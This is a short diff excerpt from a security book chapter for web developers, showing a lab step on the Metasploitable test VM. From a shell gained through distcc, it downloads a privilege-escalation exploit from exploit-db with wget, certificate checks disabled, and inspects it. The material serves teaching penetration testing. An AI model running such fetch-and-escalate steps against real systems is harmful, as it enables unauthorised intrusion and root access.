binarymist/HolisticInfoSec-For-WebDevelopers-Fascicle1/manuscript/markdown/main/chapter7.md

 G>
 G> Through our daemon shell that `distcc_exec` provided, let us fetch the exploit:
 G> `wget --no-check-certificate https://www.exploit-db.com/download/8572 -O privesc.c`
+G> The `no-check` is required because metasploitable does not have the relevant CA cert installed.
 G> Now check that the file has the contents that you expect.
 G> `cat privesc.c`
 G>